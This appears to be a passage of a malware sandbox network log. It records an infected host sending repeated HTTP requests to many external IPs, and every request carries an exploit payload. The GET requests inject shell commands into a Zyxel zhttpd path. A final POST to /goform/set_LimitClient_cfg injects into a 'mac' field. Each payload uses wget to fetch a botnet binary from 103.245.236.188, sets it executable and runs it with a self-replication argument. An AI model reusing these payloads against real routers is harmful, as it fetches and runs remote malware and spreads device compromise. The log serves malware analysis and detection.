                                    Jan 13, 2024 19:02:46.466200113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7574192.168.2.134044057.253.154.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466226101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7575192.168.2.134087665.50.66.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466285944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7576192.168.2.1339674179.96.120.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466325045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7577192.168.2.135612297.168.250.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466387033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7578192.168.2.134004271.69.226.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466447115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7579192.168.2.1344530146.98.23.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466461897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7580192.168.2.134404469.5.180.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466494083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7581192.168.2.1335542153.124.186.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466521025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7582192.168.2.1335438135.12.103.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466590881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7583192.168.2.133345247.28.231.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466619968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7584192.168.2.134156024.233.39.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466653109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7585192.168.2.133840657.102.40.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466684103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7586192.168.2.134600485.30.62.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466733932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7587192.168.2.13602228.225.43.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466799974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7588192.168.2.135763643.76.16.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466866970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7589192.168.2.133359682.151.134.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466927052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7590192.168.2.1358776154.21.146.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.466948986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7591192.168.2.1341322115.28.208.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467004061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7592192.168.2.13604629.172.248.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467020035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7593192.168.2.135324227.155.110.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467048883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7594192.168.2.1353746132.114.177.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467086077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7595192.168.2.133786062.134.179.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467148066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7596192.168.2.1348642178.35.143.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467176914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7597192.168.2.1352362129.112.200.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467227936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7598192.168.2.1355428174.81.142.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467278004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7599192.168.2.13570461.51.23.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467308998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7600192.168.2.1340702168.193.78.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467349052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7601192.168.2.1352794105.118.76.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467406034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7602192.168.2.13578161.201.31.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467443943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7603192.168.2.1335984109.243.71.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467473984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7604192.168.2.134182494.102.19.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467499018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7605192.168.2.1335050119.41.16.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467536926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7606192.168.2.133318060.40.251.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467592001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7607192.168.2.13563545.138.74.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467658997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7608192.168.2.1348586222.255.156.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467698097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7609192.168.2.135826086.102.245.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467736959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7610192.168.2.134687614.114.248.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467760086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7611192.168.2.13599701.75.47.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467803955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7612192.168.2.134297872.99.181.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467875957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7613192.168.2.134951424.150.14.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467912912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7614192.168.2.1342902170.243.239.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467968941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7615192.168.2.1360586207.101.69.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.467977047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7616192.168.2.1333058195.89.247.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468012094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7617192.168.2.133334686.100.90.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468094110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7618192.168.2.135132487.209.130.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468151093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7619192.168.2.1356370171.34.120.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468151093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7620192.168.2.1339644120.14.196.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468180895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7621192.168.2.1341816199.112.227.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468203068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7622192.168.2.133519654.250.71.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468271971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7623192.168.2.135725035.72.29.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468308926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7624192.168.2.135750299.76.48.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468347073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7625192.168.2.1344180134.202.213.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468405008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7626192.168.2.134688831.240.27.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468446970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7627192.168.2.136073037.243.59.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468471050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7628192.168.2.135194699.253.28.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.468513966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7629192.168.2.133430872.13.223.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.471697092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7630192.168.2.1340810156.189.37.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.471725941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7631192.168.2.1358904158.38.150.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.471740961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7632192.168.2.1334786147.123.162.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:46.471796989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7633192.168.2.133741814.94.101.148080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:47.409205914 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:47.697875023 CET103INHTTP/1.1 404 Not Found
                                    Content-Type: text/plain
                                    Content-Length: 30
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7634192.168.2.1339362210.211.55.70443
                                    TimestampBytes transferredDirectionData
